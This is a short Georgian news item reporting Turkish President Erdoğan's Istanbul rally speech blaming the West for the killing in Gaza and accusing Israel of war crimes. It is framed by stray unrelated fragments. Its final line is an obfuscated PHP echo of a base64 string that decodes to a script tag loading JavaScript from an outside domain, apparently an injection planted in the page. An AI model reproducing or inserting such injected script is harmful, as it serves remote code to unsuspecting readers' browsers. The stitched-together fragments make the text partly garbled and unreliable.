celsiusi
ავერსი შნაიდერი

თურქეთის პრეზიდენტის, რეჯეფ თაიფ ერდოღანის თქმით, ღაზაში მომხდარ ხოცვა-ჟლეტაზე ყველაზე დიდი პასუხისმგებლობა დასავლეთს ეკისრება.

რეჯეფ თაიფ ერდოღანმა აღნიშნა, რომ დასავლურმა სამყარომ მოახდინა თავისი პოლიტიკოსებისა და მედიის მობილიზება ღაზაში უდანაშაულო ხალხის ხოცვა-ჟლეტის ლეგიტიმაციისთვის და დასძინა, რომ ისრაელი ჩადის ომის დანაშაულებს.

თურქეთის პრეზიდენტის თქმით, ისრაელი პაიკია, რომელიც საჭიროების შემთხვევაში, შესაძლოა, გაწირონ კიდეც.

„ისინი, ვინც ნიანგის ცრემლებს ღვრიან უკრაინა-რუსეთის ომში დაღუპული მშვიდობიანი მოსახლეობის გამო, ჩუმად უყურებენ ღაზაში ათასობით უდანაშაულო ბავშვის სიკვდილს“, – განაცხადა რეჯეფ თაიფ ერდოღანმა სტამბულში პალესტინელების მხარდასაჭერად გამართულ აქციაზე სიტყვით გამოსვლისას.

454
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");